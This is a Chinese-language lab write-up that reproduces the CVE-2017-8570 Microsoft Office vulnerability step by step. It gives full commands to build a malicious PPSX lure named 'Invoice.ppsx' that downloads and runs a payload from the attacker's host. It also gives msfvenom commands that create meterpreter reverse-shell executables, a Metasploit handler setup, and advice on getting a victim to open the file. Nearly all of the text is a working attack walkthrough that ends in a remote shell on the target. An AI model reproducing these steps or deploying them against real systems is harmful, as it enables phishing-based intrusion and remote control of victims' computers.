很尴尬,此页无图
Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 RT Service Pack 1 Microsoft Office 2013 Service Pack 1 (32-bit editions) Microsoft Office 2013 Service Pack 1 (64-bit editions) Microsoft Office 2016 (32-bit edition) Microsoft Office 2016 (64-bit edition) 复现环境: 攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit 目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013 1、生成恶意文件: python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc 1、这里的IP是攻击机IP 2、Invoice.ppsx为生成的恶意文件 3、这里可能会报一个错误: IOError: [Errno 2] No such file or directory: 'template/template.ppsx' 这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题! 在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改: 修改后为此文件(template.ppsx)所在路径: 如我现在的文件为/root/Office8570-master/文件夹下,所以修改成: 接下来执行第一步生成恶意文件命令就不会报错了! 生成的恶意文件: 2、生成反弹shell文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe 设置反弹shell的ip192.168.1.194,和监听端口6666 命令执行成功: 生成的shell文件 当然了,如果目标机是64位机器那么需要执行不一样的命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe 命令执行成功 生成shell64文件 3、监听会话(来自ppsx执行反弹shell) 执行命令(32位目标机): python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe 过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马 命令执行成功监听服务启动: 接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell: Msfconsole msfconsole msf > use exploit/multi/handler msf > set LHOST 192.168.1.194 msf > set LPORT 6666 msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > exploit 同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行): msf > set pauload windows/x64/meterpreter/reverse_tcp 4、漏洞执行 最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。 文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T) Shell反弹显示get到了目标机 然后再meterpreter中可以直接执行ls命令,如下: 可见win7桌面上的文件: 我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了: